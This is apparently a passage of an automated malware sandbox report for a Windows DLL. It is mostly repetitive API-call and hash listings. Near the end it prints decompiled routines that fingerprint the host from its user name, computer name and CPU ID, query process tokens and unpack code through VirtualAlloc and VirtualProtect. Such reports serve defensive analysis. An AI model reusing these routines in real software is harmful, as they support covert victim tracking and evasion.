                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0573C1
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0573CB
                                                                                                            • int.LIBCPMT ref: 6F0573E2
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05741C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05743C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057449
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057BE7
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057BF1
                                                                                                            • int.LIBCPMT ref: 6F057C08
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057C42
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057C62
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057C6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057A28
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057A32
                                                                                                            • int.LIBCPMT ref: 6F057A49
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057A83
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057AA3
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057AB0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057993
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05799D
                                                                                                            • int.LIBCPMT ref: 6F0579B4
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0579EE
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057A0E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057A1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 2404127365-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
                                                                                                            • API String ID: 1384045349-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 2425033533-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            • API String ID: 269201875-2547889144
                                                                                                            • Opcode ID: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction ID: dd04d97c3ded2eb6ea598c02f791702432311bcdef09cb612bdcde9900f5b201
                                                                                                            • Opcode Fuzzy Hash: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction Fuzzy Hash: 65C1D271A042159BDF24DF64CC50BEEB3F9FF15718F5064AAD819AB180FB31AA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E6F031AD7(void* __ecx, WCHAR** _a4) {
                                                                                                            				struct HINSTANCE__* _v8;
                                                                                                            				long _v12;
                                                                                                            				long _t10;
                                                                                                            				long _t19;
                                                                                                            				long _t20;
                                                                                                            				WCHAR* _t23;
                                                                                                            
                                                                                                            				_v8 =  *0x6f0341b0;
                                                                                                            				_t19 = 0x104;
                                                                                                            				_t23 = E6F031000(0x208);
                                                                                                            				if(_t23 == 0) {
                                                                                                            					L8:
                                                                                                            					_t20 = 8;
                                                                                                            					L9:
                                                                                                            					return _t20;
                                                                                                            				} else {
                                                                                                            					goto L1;
                                                                                                            				}
                                                                                                            				while(1) {
                                                                                                            					L1:
                                                                                                            					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                                                                                                            					_v12 = _t10;
                                                                                                            					if(_t10 == 0 || _t19 != _t10) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t19 = _t19 + 0x104;
                                                                                                            					E6F031397(_t23);
                                                                                                            					_t23 = E6F031000(_t19 + _t19);
                                                                                                            					if(_t23 != 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				_t20 = 0;
                                                                                                            				if(_t23 == 0) {
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				if(_v12 == 0) {
                                                                                                            					_t20 = GetLastError();
                                                                                                            					E6F031397(_t23);
                                                                                                            				} else {
                                                                                                            					 *_a4 = _t23;
                                                                                                            				}
                                                                                                            				goto L9;
                                                                                                            			}










                                                                                                            APIs
                                                                                                              • Part of subcall function 6F031000: HeapAlloc.KERNEL32(00000000,?,6F0315ED,00000030,747863F0,00000000), ref: 6F03100C
                                                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,6F031668,?), ref: 6F031B00
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F031668,?), ref: 6F031B3E
                                                                                                              • Part of subcall function 6F031397: HeapFree.KERNEL32(00000000,?,6F031B4C,00000000,?,?,?,6F031668,?), ref: 6F0313A3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                            • String ID: @Mxt MxtTxt
                                                                                                            • API String ID: 1691993961-1084903527
                                                                                                            • Opcode ID: 61ccb46067dd71d790fcbbf211b25d7bfd56340268e0fc3123a1406ffaa92ee0
                                                                                                            • Instruction ID: 319d638f87fc865e312b9c8117685bd9b03f7606010509ab1a70ac9f3629e572
                                                                                                            • Opcode Fuzzy Hash: 61ccb46067dd71d790fcbbf211b25d7bfd56340268e0fc3123a1406ffaa92ee0
                                                                                                            • Instruction Fuzzy Hash: 7001B133E00A37E7CB2197698C44B8FBAE9DF8E790B010122E90097240FB70D84186A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Executed Functions

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0303A82B(char __eax, void* __esi) {
                                                                                                            				long _v8;
                                                                                                            				char _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v28;
                                                                                                            				long _t34;
                                                                                                            				signed int _t39;
                                                                                                            				long _t50;
                                                                                                            				char _t59;
                                                                                                            				intOrPtr _t61;
                                                                                                            				void* _t62;
                                                                                                            				void* _t64;
                                                                                                            				char _t65;
                                                                                                            				intOrPtr* _t67;
                                                                                                            				void* _t68;
                                                                                                            				void* _t69;
                                                                                                            
                                                                                                            				_t69 = __esi;
                                                                                                            				_t65 = __eax;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = __eax;
                                                                                                            				if(__eax == 0) {
                                                                                                            					_t59 =  *0x303d2a8; // 0xd448b889
                                                                                                            					_v12 = _t59;
                                                                                                            				}
                                                                                                            				_t64 = _t69;
                                                                                                            				E030360B6( &_v12, _t64);
                                                                                                            				if(_t65 != 0) {
                                                                                                            					 *_t69 =  *_t69 ^  *0x303d2dc ^ 0x46d76429;
                                                                                                            				} else {
                                                                                                            					GetUserNameW(0,  &_v8); // executed
                                                                                                            					_t50 = _v8;
                                                                                                            					if(_t50 != 0) {
                                                                                                            						_t62 = RtlAllocateHeap( *0x303d270, 0, _t50 + _t50);
                                                                                                            						if(_t62 != 0) {
                                                                                                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                            								_t64 = _t62;
                                                                                                            								 *_t69 =  *_t69 ^ E0303789B(_v8 + _v8, _t64);
                                                                                                            							}
                                                                                                            							HeapFree( *0x303d270, 0, _t62);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t61 = __imp__;
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				GetComputerNameW(0,  &_v8);
                                                                                                            				_t34 = _v8;
                                                                                                            				if(_t34 != 0) {
                                                                                                            					_t68 = RtlAllocateHeap( *0x303d270, 0, _t34 + _t34);
                                                                                                            					if(_t68 != 0) {
                                                                                                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                            							_t64 = _t68;
                                                                                                            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0303789B(_v8 + _v8, _t64);
                                                                                                            						}
                                                                                                            						HeapFree( *0x303d270, 0, _t68);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				asm("cpuid");
                                                                                                            				_t67 =  &_v28;
                                                                                                            				 *_t67 = 1;
                                                                                                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                            				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                            				 *(_t67 + 0xc) = _t64;
                                                                                                            				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                            				return _t39;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0303A862
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0303A879
                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0303A886
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0303538B), ref: 0303A8A7
                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0303A8CE
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0303A8E2
                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0303A8EF
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0303538B), ref: 0303A90D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3239747167-1536154274
                                                                                                            • Opcode ID: 6c6c5d86565d6e474fa6a6c05aeea5384109640ee412efcbf188bbe6178a1f4c
                                                                                                            • Instruction ID: 333e8ed5d98e4ade6c7a67b09c042153acc40152acc411a0e109e73175c35aee
                                                                                                            • Opcode Fuzzy Hash: 6c6c5d86565d6e474fa6a6c05aeea5384109640ee412efcbf188bbe6178a1f4c
                                                                                                            • Instruction Fuzzy Hash: 57313B71A01209EFEB20EFA9DD80AAEF7FDFF49200F15406AE545E3204DB34DA019B10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6F0DDA28), ref: 6F0DE097
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6F0DDA88), ref: 6F0DE0CE
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6F0DE12E
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE164
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00000000,00000004,6F0DDFB9), ref: 6F0DE269
                                                                                                            • VirtualProtect.KERNEL32(6F030000,00001000,00000004,6F0DDFB9), ref: 6F0DE290
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9), ref: 6F0DE35D
                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000002,6F0DDFB9,?), ref: 6F0DE3B3
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F0DE3CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753564026.000000006F0DD000.00000040.00020000.sdmp, Offset: 6F0DD000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Protect$Alloc$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2574235972-0
                                                                                                            • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction ID: 2512d9ebc86b1d5572e1fe27dd23102369d4e81253cfc23d2c29ea2b3eba83e7
                                                                                                            • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                            • Instruction Fuzzy Hash: 62D158726206209FDB12CF18CD80B5677E7EF48B92F0841A5ED4A9F35AD770BA41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 38%
                                                                                                            			E03035D10(char _a4, void* _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				char _v16;
                                                                                                            				void* _v20;
                                                                                                            				char _v24;
                                                                                                            				char _v28;
                                                                                                            				char _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v40;
                                                                                                            				void* _v44;
                                                                                                            				void** _t33;
                                                                                                            				void* _t40;
                                                                                                            				void* _t43;
                                                                                                            				void** _t44;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				char _t48;
                                                                                                            
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				_v20 = _a4;
                                                                                                            				_t48 = 0;
                                                                                                            				_v16 = 0;
                                                                                                            				_a4 = 0;
                                                                                                            				_v44 = 0x18;
                                                                                                            				_v40 = 0;
                                                                                                            				_v32 = 0;
                                                                                                            				_v36 = 0;
                                                                                                            				_v28 = 0;
                                                                                                            				_v24 = 0;
                                                                                                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                            					_t33 =  &_v8;
                                                                                                            					__imp__(_v12, 8, _t33);
                                                                                                            					if(_t33 >= 0) {
                                                                                                            						_t47 = __imp__;
                                                                                                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                            						_t44 = E030375F6(_a4);
                                                                                                            						if(_t44 != 0) {
                                                                                                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                            							if(_t40 >= 0) {
                                                                                                            								memcpy(_a8,  *_t44, 0x1c);
                                                                                                            								_t48 = 1;
                                                                                                            							}
                                                                                                            							E03034AAB(_t44);
                                                                                                            						}
                                                                                                            						NtClose(_v8); // executed
                                                                                                            					}
                                                                                                            					NtClose(_v12);
                                                                                                            				}
                                                                                                            				return _t48;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03035D57
                                                                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 03035D6A
                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03035D86
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03035DA3
                                                                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 03035DB0
                                                                                                            • NtClose.NTDLL(?), ref: 03035DC2
                                                                                                            • NtClose.NTDLL(00000000), ref: 03035DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2575439697-0
                                                                                                            • Opcode ID: 87a923d4beb9ccb55ed6045fbb3fa28288449db07bc20bc664e82eee7d6f23ec
                                                                                                            • Instruction ID: 24ef43af4b5f7afb6b9629ebcaecc8ee8782dba857fad1ada154d50f8936e7dc
                                                                                                            • Opcode Fuzzy Hash: 87a923d4beb9ccb55ed6045fbb3fa28288449db07bc20bc664e82eee7d6f23ec
                                                                                                            • Instruction Fuzzy Hash: 0821E976901218BBEB11EF95CC45EDEBFBDEF4A750F104416F901F6120D7719A449BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6F045696
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,6F0DB7A0,000008BB), ref: 6F04576F
